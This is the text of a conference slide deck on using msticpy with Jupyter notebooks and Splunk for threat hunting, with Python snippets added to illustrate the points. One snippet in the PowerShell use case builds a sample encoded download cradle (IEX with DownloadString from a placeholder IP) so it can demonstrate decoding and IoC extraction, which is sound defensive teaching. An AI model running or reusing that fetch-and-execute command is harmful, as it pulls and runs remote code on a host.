Practical msticpy use ~ rainbow bridge to SIEM for advanced threat hunting ~

September 08, 23

Slide overview

[EN] Hasegawa_DFIR_APAC_SUMMIT_2023
https://www.sans.org/cyber-security-training-events/apac-dfir-summit-2023/

Security Engineer & Researcher https://www.hacket-engine.com


Text of each page
2.

$WHOAMI
• Threat Hunter / App Developer / Threat Researcher
• OSS Contributor
  • msticpy, unprotect, atomic-red-team, cuckoo, capev2, ...
• Qualifications
  • 7 GIACs
  • CISSP, CISA
• SNS
  • HN: hackeT
  • X: @T_8ase
Diagram labels: CSIRT Incident Handler, Forensic, Full-stack Engineer, Service Dev/Operation, SOC Analyst, MSSP, Threat Researcher/binarian, AI Anti-Virus
Fighting injustice attack world !

3.

$more GoAhead Inc.
• Established in 2017
• Data Analysis Company
• Splunk is our strength for Security Challenges
• CEO: Mitsuhiro Nakamura
• Splunk.conf 2017@USA
• Splunk Champion
• Free Splunk App/Add-ons by GoAhead https://splunkbase.splunk.com/apps?keyword=goahead
• KOBANZAME (IP Whois DB), Heuristic Logic, Data Visualization
• Aim for maximum effectiveness with minimum resources

4.

Agenda
• Invariable Operation with SIEM
• msticpy 101 Overview and Basics
• msticpy 201 Jupyter Notebook and ( pros | cons )
• msticpy 301 Practical use case
• Take Away

5.

Invariable Operation with SIEM

6.

Background and Issues
Old fashioned
• Analysis: Human-wave tactics for raw logs
• Monitoring: Alert by Email
Nowadays
• Analysis: Multi-axis search of formatted logs
• Monitoring: Visualized Dashboard, Alert from SIEM
Never ending Dev & Ope tasks (Documentations, Modify Thresholds, Bugs, Update, Add Panels)
• Modification and addition of analytical logic to keep up with new threats
• Thresholds tailored to the internal situation as well as the threat situation in the world
Biases from SIEM functions and existing dashboards sometimes lead to non-free analysis

7.

Objective: Advanced Threat Hunting
Threat Hunting
• Proactive detection and response to signs of malicious activity or threats
• Investigate using threat intelligence, unapplied IOCs, anomaly detection
• Iterations between hypothesis and verification
Advanced Threat Hunting
• Identifying undetected threats from raw data
  • Check raw data too and look for omissions in processing and detection by security products.
• Inherently data analysis with freedom (ad hoc)
  • uniquely conceived analytical logic
  • unrestricted external collaboration
  • eccentric visualization
  • emphasis that is easy for readers to understand
• Continuous update operation
  • Machine Learning & Deep Learning (ML/DL)
  • Automation

8.

Security Information and Event Management
• First Generation (Gartner 2005): Log and Event management integration
• Second Generation: Correlation analysis with CTI, Big data processing
• Third Generation (Gartner 2017): UEBA, SOAR addition
• SIEM Products
  • Splunk / MS Sentinel / IBM QRadar / Exabeam / Sumo Logic / Elastic, etc.
• SIEM by Security vendors
  • Can collect/extract/search/analyze/visualize/detect/respond
  • Have the individual threat hunting function
  • Have ML/DL extensions
source: Gartner Inc, 2022 Magic Quadrant

9.

SIEM's advantage
• Rapid search by indexing and field normalization (CIM, ASIM)
• Statistical calculations are easy with the benefit of its search language
• Can store threat intelligence
• Multiple analysts can see the same data and analysis results
• SIEM vendors also provide a lot of detection logic

10.

SIEM's breakdown
• Rapid search by indexing and field normalization (CIM, ASIM)
  • If extraction fails, the data is missing from the search at the beginning or from the analysis along the way.
• Statistical calculations are easy with the benefit of its search language
  • Some processing is a poor fit for the search language, and learning the language has a cost
• Can store threat intelligence
  • Most of the intelligence has to be prepared and operated by ourselves.
• Multiple analysts can see the same data and analysis results
  • Various limitations due to shared resources
• SIEM vendors also provide a lot of detection logic
  • Necessary and sufficient? No!

11.

Relying too much on SIEM analysis is not recommended!
• When a failure occurs, no one can analyze anything until recovery.
• Over-reliance on analysis in the SIEM search language only leads to forgetting how to analyze raw data
• Who will ensure the integrity of the data and search results in SIEM?
• Limitations of SIEM
  • Default upper limits for subsearch and multivalue results (truncation)
  • Default upper limit for the number of plots on a graph (truncation)
  • Difficult to notice search omissions due to misconfiguration
• Don't rely solely on the logic provided by the SIEM vendor
  • Enterprise SIEMs Miss 76 Percent of MITRE ATT&CK Techniques
  • source: CardinalOps, "2023 Report on State of SIEM Detection Risk"

12.

For Advanced Threat Hunting
Diagram labels: msticpy, SIEM, Automation, Infinite Visualization, Machine Learning, Data Validation, Consistent I/O, Time Series Analysis

13.

msticpy 101 Overview and Basics

14.

Microsoft Threat Intelligence Center (MSTIC) on Python and Jupyter Notebooks: msticpy
• MSTICpy: OSS library developed by Microsoft's MSTIC
• Written in Python, usually used on Jupyter Notebooks
• Extensive functionality for breach investigation and threat hunting
• Since March 2019, 200k+ downloads https://github.com/microsoft/msticpy
• Presented at BlackHat USA 2020
• Frequently updated recently and continues to evolve
• Still few users and blog articles in Asia and Japan
• Falls broadly into the following four processes
  • Data Acquisition, Data Processing, Analysis including ML, Visualization
• Because it is a library, only the desired functions can be used, piecemeal

15.

msticpy's Documentation & Resources
• MSTICpy ☞ "msticpy" in this presentation
• Official document
  • https://msticpy.readthedocs.io
  • Word count 100k+
  • RST files 80+
  • Jupyter Notebook samples 40+
  • Past training resources
    • msticpy-lab, msticpy-training github repo
• Official Blog
  • https://msticpy.medium.com
Learning from these huge resources is time-consuming ...

16.

msticpy Capabilities
Diagram labels: Acquisition (Querying Logs), Visualization (Data Visualization), Analysis (Utility, Pivot, Security Analysis), Enrichment (Data Enrichment), msticpyconfig.yaml
source: https://twitter.com/fr0gger_/status/1623209441146593281?s=61&t=v8tLnMcFFdnsiT38CeGBcg

17.

msticpy Data Flow Diagram
• Acquisition: raw data from DataLake (SIEM) to Jupyter Notebook
• Enrichment (Internet)
  • Threat Intel Lookup
  • Whois, GeoIP
• Local Analysis (Local)
  • Decode
  • Extract
  • ML
• Visualization
• Upload: rich data to SIEM

18.

msticpy: Data Acquisition (1)
• Create an instance of Query Provider
• Select from the data sources (left picture)
  • LocalData: connect to .pkl files in ./data dir
  • Splunk: connect to the Splunk REST port with msticpyconfig.yaml
• The communication channel is NOT independently encrypted by msticpy's own functions => HTTPS (SSL) is necessary

19.

msticpy: Data Acquisition (2)
• Return: Pandas DataFrame
• Ad hoc query function
  • exec_query(): arbitrary query
• Built-in query function
  • select from a list that varies by data source
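A minimal sketch of the two acquisition steps, assuming msticpy and the Splunk SDK are installed and that msticpyconfig.yaml already holds the Splunk connection settings. `build_spl` and `run_adhoc_query` are hypothetical helper names, and the index and search term are placeholders, not values from the slides.

```python
def build_spl(index: str, term: str, earliest: str = "-24h") -> str:
    """Build a simple SPL search string (illustrative helper, not part of msticpy)."""
    return f'search index={index} "{term}" earliest={earliest}'


def run_adhoc_query(spl: str):
    """Run an ad hoc query via a msticpy Query Provider and return a DataFrame."""
    # Imported lazily so build_spl() can be used without msticpy installed.
    from msticpy.data import QueryProvider

    qry_prov = QueryProvider("Splunk")   # create the Query Provider instance
    qry_prov.connect()                   # assumes settings come from msticpyconfig.yaml
    print(qry_prov.list_queries())       # built-in queries for this data source
    return qry_prov.exec_query(spl)      # ad hoc query, returns a pandas DataFrame


spl = build_spl("botsv2", "powershell")
print(spl)
# df = run_adhoc_query(spl)  # needs a reachable Splunk REST endpoint over HTTPS
```

Keeping the query string in a separate helper makes it easy to print and review the exact search before it is sent to the SIEM.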

20.

msticpy: Enrichment
• Threat Intel Lookup
  • Pivot TI function (only on Jupyter Notebook)
  • TILookup class (also available in plain Python programs)
• GeoIP (MaxMind GeoLite2, IPStack)
• IPWhois (Cymru, RADB, RDAP)

21.

msticpy: Analysis (Utility)
• Base64 Decode
• IoC Extract

22.

msticpy: Analysis (Pivot)
• Basically requires that the Pivot functions be loaded by "init_notebook()"
• Wraps msticpy functions and classes for ease of discovery and use
• Standardization of function parameters, syntax, and output format
• ".mp_pivot." can be piped in multiple stages

23.

msticpy: Analysis (Security)
• Event Clustering
  • Classification of "process and logon events" on the host machine
• Time Series Analysis
  • Anomaly detection in time series data considering seasonal variations
• Outlier Identification
  • Outlier detection using decision trees
• Anomalous Session
  • Unusual pattern detection of rare event sequences with low likelihood
  • Use of the event's command name, its parameter names and values

24.

msticpy: Visualization
• Implemented with BokehJS
• Viz charts implemented in msticpy
  • Timeline, ProcessTree, Folium Map, Matrix Plot, Entity/Network Graph, etc.
• Can create additional charts with MorphCharts

25.

msticpy 201 Jupyter Notebook and ( pros | cons )

26.

Benefits of Analyzing with Jupyter Notebook
• Reproducibility of data; intermediate results can be output
• Easy combination/integration with external sources
• Easy use of ML/DL frameworks
• Extensive visualization libraries at your disposal
• Gain applied skills as a data scientist

27.

Ideal Relationship between Jupyter Notebook and SIEM
• SIEM: Rough noise reduction
• msticpy: Deep Analysis on denoised data (Intelligence, Knowledge)
• Together: Advanced Threat Hunting

28.

msticpy's pros: Seasonal-Trend decomposition using LOESS (STL)
Book: Also covered in "Machine Learning for Security Engineers", Chapter 6 "Anomaly Detection"
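To illustrate the idea of seasonality-aware anomaly detection, here is a simplified stand-in written with the standard library only. It is not STL: it has no trend component and no LOESS smoothing, it simply uses the per-phase median as the seasonal component and flags large residuals. The function name, the synthetic hourly data, and the threshold are all assumptions for illustration.

```python
import statistics


def seasonal_anomalies(values, period, threshold=3.0):
    """Return indices whose residual deviates strongly from the seasonal pattern."""
    # Seasonal component: median of all observations that share the same phase.
    seasonal = [statistics.median(values[phase::period]) for phase in range(period)]
    residuals = [v - seasonal[i % period] for i, v in enumerate(values)]
    # Robust spread: median absolute deviation (MAD), scaled to be comparable to a std dev.
    center = statistics.median(residuals)
    mad = statistics.median([abs(r - center) for r in residuals])
    scale = 1.4826 * mad if mad > 0 else 1.0
    return [i for i, r in enumerate(residuals) if abs(r - center) / scale > threshold]


# Synthetic data: 7 days of hourly event counts, busier during business hours.
hourly = []
for i in range(24 * 7):
    hour = i % 24
    base = 140 if 9 <= hour < 18 else 100
    hourly.append(base + (7 * i) % 5 - 2)   # small deterministic jitter
hourly[100] += 200                          # injected spike at 04:00 on day 5

anomalies = seasonal_anomalies(hourly, period=24)
print(anomalies)
```

A fixed threshold on the raw counts would either miss a night-time spike or fire on every business-hours peak; removing the seasonal pattern first avoids both.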

29.

msticpy's pros: Consistent I/O
• Sending by the Data Uploader function (Transfer)
  • Only Azure Sentinel and Splunk are supported as of Aug 2023
  • Can upload DataFrame, File, Folder
• msticpy enriching SIEM! (OSINT (Internet) → msticpy → SIEM)
• Visualization charts cannot be transferred. However, similar Viz can be drawn in SIEM from the transferred results.

30.

Jupyter & msticpy's pros: Data Validation
• Check the DataFrame result sequentially
• Guard against accidental overwriting with the copy() function
• Value type conversion and stripping of null values
• Easy to validate character codes
• GUI for time ranges ☞
• Check the actual query in advance via Query Provider with the "print" option (figure: query to be searched)

31.

Jupyter's pros: Use of much ML/DL
• Only a few ML models are built into msticpy
  • Event Clustering ☞ DBSCAN in scikit-learn
  • Time Series Analysis and Anomalies ☞ STL in statsmodels
  • Outlier Identification ☞ IsolationForest in scikit-learn
  • Less parameter tuning is required since they are specialized for commonly used threat hunting applications
• Flexibility to use Python's rich ML/DL libraries (NLP, ML, DL)

32.

Jupyter's pros: Infinite Visualization
Maximum number of data plots (by default)
• Splunk: 10,000
• MS Sentinel: 10,000
• Jupyter: ♾ (Infinity)
This data was truncated in Splunk!
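A small sketch of why a plot limit matters for hunting. It assumes the chart keeps only the first 10,000 results, which is a simplification: the exact truncation behaviour depends on the product and chart settings. The helper names and the synthetic data are made up for illustration.

```python
PLOT_LIMIT = 10_000  # default cap quoted above


def truncate_for_chart(points, limit=PLOT_LIMIT):
    """Mimic a chart that silently keeps only the first `limit` points (assumed behaviour)."""
    return points[:limit]


def was_truncated(points, limit=PLOT_LIMIT):
    """Cheap validation step: did the result set exceed the plot limit?"""
    return len(points) > limit


events = [1] * 12_000
events[11_000] = 500            # the interesting spike sits beyond the limit

charted = truncate_for_chart(events)
print(len(charted), max(charted), max(events), was_truncated(events))
```

In a notebook the full series stays available, so a check like `was_truncated` can be run before trusting what a capped chart shows.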

33.

[FYI] Change the upper limit in the dashboard options
• We can change the limit with the dashboard option "charting.data.count" in Splunk, but...

34.

Jupyter's pros: Automation with papermill
• Python library
• Batch execution of Notebook files with different parameters
• Introduced in the "Put it into Operation" section at the end of msticpy's training materials
• Can be run from the CUI or from Python
• Parameters are overwritten in the output notebook ☟
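As a rough sketch of batch execution, the snippet below only builds papermill command lines (`papermill INPUT OUTPUT -p NAME VALUE`) for several parameter sets and prints them; it does not run them. The notebook name, output paths, and the parameter names `target_host` and `lookback_days` are hypothetical.

```python
import shlex


def papermill_command(input_nb, output_nb, parameters):
    """Build the argv list for one papermill run with the given parameters."""
    cmd = ["papermill", input_nb, output_nb]
    for name, value in parameters.items():
        cmd += ["-p", name, str(value)]   # one -p NAME VALUE pair per parameter
    return cmd


hosts = ["web01", "db01"]
commands = [
    papermill_command(
        "hunting.ipynb",
        f"out/hunting_{host}.ipynb",
        {"target_host": host, "lookback_days": 7},
    )
    for host in hosts
]

for cmd in commands:
    print(shlex.join(cmd))   # pass cmd to subprocess.run(cmd, check=True) to execute
```

The same runs can be started from Python with `papermill.execute_notebook(input_path, output_path, parameters={...})`. Either way, each output notebook keeps the injected parameter values next to its results.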

35.

Jupyter's cons: Security Concerns about Data Transfer
• Possibility of transferring sensitive data in SIEM to an external Jupyter
  • Handling it with SIEM's ACL may be the only way.
• Eavesdropping/MITM attack during data transfer to Jupyter
  • SSL security depends on the SIEM side
• More complicated security design
• Transferring Threat Intelligence data to SIEM is relatively clear.
Diagram labels: msticpy (Jupyter), SIEM

36.

msticpy 301 Practical use case

37.

Toward Practical msticpy Use
• Push direction is fine
  • Intelligence collected from external sources, analyzed and processed, and transferred to SIEM
• Pull direction has the security concern of data transfer.
  • Planning a new security design from scratch for msticpy alone is a hurdle.
• SIEM vendors' advanced analytical mechanisms with Jupyter
  • MS Sentinel ☞ "Microsoft Azure Machine Learning Workspace"
    • Completed within Azure
  • Splunk ☟ "Splunk App for Data Science and Deep Learning (DSDL)"
    • Preparing machine resources such as Docker containers externally
    • Data exchange between containers and Splunk
    • Installing msticpy on the container side
+ Store the credential strings in "Azure Key Vault" and load them from there
Diagram labels: msticpy, Splunk DSDL

38.

$more Splunk App for DSDL
• single-instance | side-by-side
• Implemented data security features
  • Use of your own SSL certificates
  • Custom password settings for Jupyter
  • Fine-grained ACL design with Splunk access tokens
• Splunk MLTK commands can interact with containers
  • | fit ( Training to create a model )
  • | apply ( Apply the trained model to the data for identification )

39.

Use Case: PowerShell process command line (1)
• Search in Splunk: powershell -enc
• | fit (required the first time for model creation) or | apply
  • Decode base64
  • Delete null byte (\x00)
  • Extract IoC
  • Enrichment IoC
• Return to Splunk
Originally, this mechanism is prepared for ML/DL algorithms, so I developed a custom model incorporating msticpy.
By executing the fit command, one .py file is created in the app/model directory; the file consists of functions exported from the .ipynb.
https://github.com/Tatsuya-hasegawa/MSTICPy_utils/blob/main/splunk_dsdl/msticpy_powershell_ioc.ipynb
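The decode and extract steps of this use case can be sketched with the standard library alone. This is a stand-in for illustration, not the author's notebook and not msticpy's own base64 or IoC extraction functions. The regular expressions are deliberately narrow, and the sample command line (with the documentation address 203.0.113.10) is made up.

```python
import base64
import re

ENC_ARG = re.compile(r"-enc\w*\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
URL = re.compile(r"https?://[^\s'\"]+")
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def decode_encoded_command(cmdline):
    """Decode the base64 argument of `powershell -enc ...`; return None if absent."""
    match = ENC_ARG.search(cmdline)
    if match is None:
        return None
    raw = base64.b64decode(match.group(1))
    # PowerShell encodes the script as UTF-16LE, so ASCII text carries a null
    # byte after every character; deleting \x00 leaves readable text.
    return raw.replace(b"\x00", b"").decode("utf-8", errors="replace")


def extract_iocs(text):
    """Pull simple URL and IPv4 indicators out of decoded script text."""
    return {"url": URL.findall(text), "ipv4": IPV4.findall(text)}


# Made-up sample: encode a download cradle the way PowerShell expects it.
script = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
payload = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
cmdline = f"powershell.exe -enc {payload}"

decoded = decode_encoded_command(cmdline)
iocs = extract_iocs(decoded)
print(decoded)
print(iocs)
```

Deleting null bytes follows the step listed above and works for ASCII scripts; decoding the bytes as UTF-16LE is the more general alternative when non-ASCII characters may appear.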

40.

Use Case: PowerShell process command line (2)
Screenshots: fit, apply, msticpy results
※ Example of the Splunk botsv2 dataset

41.

Take Away
• Relying too much on SIEM analysis is not recommended!
• msticpy's missionary work: happy to see more APAC users
• Let's analyze and code on Jupyter Notebook to hone your skills!
• Let's build on existing mechanisms for data security concerns!
• Let's become a contributor to your favorite OSS.
Happy msticpying!

42.

Quotations & References
• msticpy docs https://msticpy.readthedocs.io/en/latest/
• msticpy-training https://github.com/microsoft/msticpy-training
• msticpy-lab https://github.com/microsoft/msticpy-lab
• Splunk DSDL docs https://docs.splunk.com/Documentation/DSDL/5.1.0/User/IntroDSDL
• Splunk botsv2 dataset https://github.com/splunk/botsv2
• Microsoft Sentinel Notebook and msticpy https://learn.microsoft.com/en-us/azure/sentinel/notebook-get-started
• papermill docs https://papermill.readthedocs.io/en/latest/
• macnica SIEM introduction by exabeam https://www.macnica.co.jp/business/security/manufacturers/exabeam/feature_07.html
• My Qiita blog about msticpy https://qiita.com/hackeT
• Machine Learning for Security Engineers https://www.oreilly.co.jp/books/9784873119076/
• awesome detection engineering https://github.com/infosecB/awesome-detection-engineering
• CardinalOps's 2023 report https://cardinalops.com/whitepapers/2023-report-on-state-of-siem-detection-risk/

43.

Thank you !